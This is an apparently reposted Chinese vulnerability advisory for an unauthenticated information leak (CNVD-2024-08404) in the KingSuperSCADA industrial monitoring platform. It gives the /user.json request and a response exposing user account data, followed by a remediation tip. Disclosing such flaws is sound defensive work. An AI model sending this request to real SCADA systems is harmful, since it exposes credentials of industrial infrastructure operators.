KingSuperSCADA信息泄露 | CNVD-2024-08404

admin 2024年2月27日10:22:21评论27 views字数 1318阅读4分23秒阅读模式

本文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

漏洞说明

      KingSuperSCADA是一款全组态型监控平台软件,适用于能源、水利、军工、电力、市政等全工业领域。具有自主研发、安全可控、稳定可靠、分布式部署、架构灵活、性能卓越等的产品特性,致力于保障国家公共安全和工业信息化安全。此外,它还是热网、燃气、油田、地铁等行业的巨型SCADA监控平台,致力于解决分布式采集难、大规模时效性和可靠性差等问题

       KingSuperSCADA存在信息泄露漏洞,攻击者可利用该漏洞获取敏感信息。

影响版本

KingSuperSCADA

漏洞复现

payload:

/user.json/file/getMainConfigProject.....

请求包:

GET /user.json HTTP/1.1Host: hostAccept: application/json, text/javascript, */*; q=0.01User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36Content-Length: 2

响应包:

HTTP/1.1 200 OKX-Powered-By: ExpressAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-Type,Content-Length,Authorizaiton,Accept,X-Requested-WithAccess-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONSContent-Type: application/jsonExpires: Tue, 27 Feb 2024 01:26:06 GMTCache-Control: max-age=1Last-Modified: Thu, 01 Feb 2024 03:17:45 GMTVary: Accept-EncodingDate: Tue, 27 Feb 2024 01:26:05 GMTConnection: keep-aliveContent-Length: 11401
{ "KingAdmin": { "name": "KingAdmin", "nickname": "", "id": "R19NKuFcmb4w5u0O", "jobNum": "t19NKuFcBa2H15yX", "isAdmin": false, "description": "", "password": "xxxxxxxxx",    .....

KingSuperSCADA信息泄露 | CNVD-2024-08404

KingSuperSCADA信息泄露 | CNVD-2024-08404

修复建议

严格检查接口权限配置,禁止未授权访问

本文章仅用于学习交流,不得用于非法用途

星标加关注,追洞不迷路


原文始发于微信公众号(才疏学浅的H6):KingSuperSCADA信息泄露 | CNVD-2024-08404

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月27日10:22:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   KingSuperSCADA信息泄露 | CNVD-2024-08404http://cn-sec.com/archives/2529140.html

发表评论

匿名网友 填写信息